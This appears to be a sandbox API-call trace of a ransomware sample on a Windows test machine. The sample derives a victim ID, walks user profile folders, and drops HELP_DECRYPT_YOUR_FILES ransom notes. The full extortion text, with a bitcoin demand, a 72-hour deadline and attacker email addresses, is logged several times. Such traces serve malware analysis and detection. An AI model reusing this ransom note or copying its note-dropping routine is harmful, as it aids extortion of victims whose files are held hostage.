	[0198.869] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0198.869] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0198.870] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0198.871] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0198.871] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\SendTo\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\sendto\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0198.872] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0198.872] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0198.872] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0198.872] CloseHandle (hObject=0x380) returned 1
	[0198.872] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0198.873] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0198.873] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0198.873] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\SendTo\\HELP_DECRYPT_YOUR_FILES.HTML") returned 57
	[0198.873] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\SendTo\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\sendto\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0198.873] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0198.874] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0198.877] CloseHandle (hObject=0x380) returned 1
	[0198.877] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0198.877] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0198.878] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0198.878] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0198.879] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0198.879] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\SendTo\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\sendto\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0198.879] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0198.879] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0198.879] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0198.880] CloseHandle (hObject=0x380) returned 1
	[0198.880] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\SendTo\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\sendto\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x4377acca, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4377acca, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4377acca, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff
	[0198.880] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0198.880] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1
	[0198.880] lstrcmpW (lpString1="Start Menu", lpString2="..") returned 1
	[0198.880] lstrcmpW (lpString1="Start Menu", lpString2=".") returned 1
	[0198.880] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\RDhJ0CNFevzX" | out: lpString1="C:\\Users\\RDhJ0CNFevzX") returned="C:\\Users\\RDhJ0CNFevzX"
	[0198.880] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\") returned="C:\\Users\\RDhJ0CNFevzX\\"
	[0198.881] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\", lpString2="Start Menu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Start Menu") returned="C:\\Users\\RDhJ0CNFevzX\\Start Menu"
	[0198.881] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Start Menu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Start Menu") returned="C:\\Users\\RDhJ0CNFevzX\\Start Menu"
	[0198.881] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Start Menu", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Start Menu\\") returned="C:\\Users\\RDhJ0CNFevzX\\Start Menu\\"
	[0198.881] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\RDhJ0CNFevzX\\Start Menu\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Start Menu\\") returned="C:\\Users\\RDhJ0CNFevzX\\Start Menu\\"
	[0198.881] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Start Menu\\", lpString2="*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Start Menu\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Start Menu\\*.*"
	[0198.881] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Start Menu\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\start menu\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x4377acca, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4377acca, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4377acca, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff
	[0198.881] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0198.881] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Start Menu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Start Menu") returned="C:\\Users\\RDhJ0CNFevzX\\Start Menu"
	[0198.881] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Start Menu", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Start Menu\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Start Menu\\*.*"
	[0198.882] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0198.882] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0198.882] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Start Menu\\HELP_DECRYPT_YOUR_FILES.TXT") returned 60
	[0198.882] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Start Menu\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\start menu\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0198.902] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0198.902] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0198.905] CloseHandle (hObject=0x380) returned 1
	[0199.087] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0199.088] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.088] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0199.089] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0199.089] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Start Menu\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\start menu\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0199.089] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0199.090] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0199.090] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0199.090] CloseHandle (hObject=0x380) returned 1
	[0199.119] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0199.119] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0199.119] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0199.119] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Start Menu\\HELP_DECRYPT_YOUR_FILES.HTML") returned 61
	[0199.119] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Start Menu\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\start menu\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0199.124] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0199.124] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0199.149] CloseHandle (hObject=0x380) returned 1
	[0199.162] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0199.162] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0199.163] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.163] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0199.164] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0199.164] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Start Menu\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\start menu\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0199.165] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0199.165] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0199.165] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0199.166] CloseHandle (hObject=0x380) returned 1
	[0199.166] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Start Menu\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\start menu\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x4377acca, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4377acca, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4377acca, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff
	[0199.166] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0199.166] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1
	[0199.167] lstrcmpW (lpString1="Templates", lpString2="..") returned 1
	[0199.167] lstrcmpW (lpString1="Templates", lpString2=".") returned 1
	[0199.167] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\RDhJ0CNFevzX" | out: lpString1="C:\\Users\\RDhJ0CNFevzX") returned="C:\\Users\\RDhJ0CNFevzX"
	[0199.167] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\") returned="C:\\Users\\RDhJ0CNFevzX\\"
	[0199.167] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\", lpString2="Templates" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Templates") returned="C:\\Users\\RDhJ0CNFevzX\\Templates"
	[0199.167] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Templates" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Templates") returned="C:\\Users\\RDhJ0CNFevzX\\Templates"
	[0199.168] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Templates", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Templates\\") returned="C:\\Users\\RDhJ0CNFevzX\\Templates\\"
	[0199.168] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\RDhJ0CNFevzX\\Templates\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Templates\\") returned="C:\\Users\\RDhJ0CNFevzX\\Templates\\"
	[0199.168] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Templates\\", lpString2="*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Templates\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Templates\\*.*"
	[0199.168] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Templates\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\templates\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x4377acca, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4377acca, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4377acca, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff
	[0199.168] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0199.168] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Templates" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Templates") returned="C:\\Users\\RDhJ0CNFevzX\\Templates"
	[0199.169] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Templates", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Templates\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Templates\\*.*"
	[0199.169] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0199.169] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0199.169] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Templates\\HELP_DECRYPT_YOUR_FILES.TXT") returned 59
	[0199.169] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Templates\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\templates\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0199.172] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0199.172] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0199.176] CloseHandle (hObject=0x380) returned 1
	[0199.176] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0199.177] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.177] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
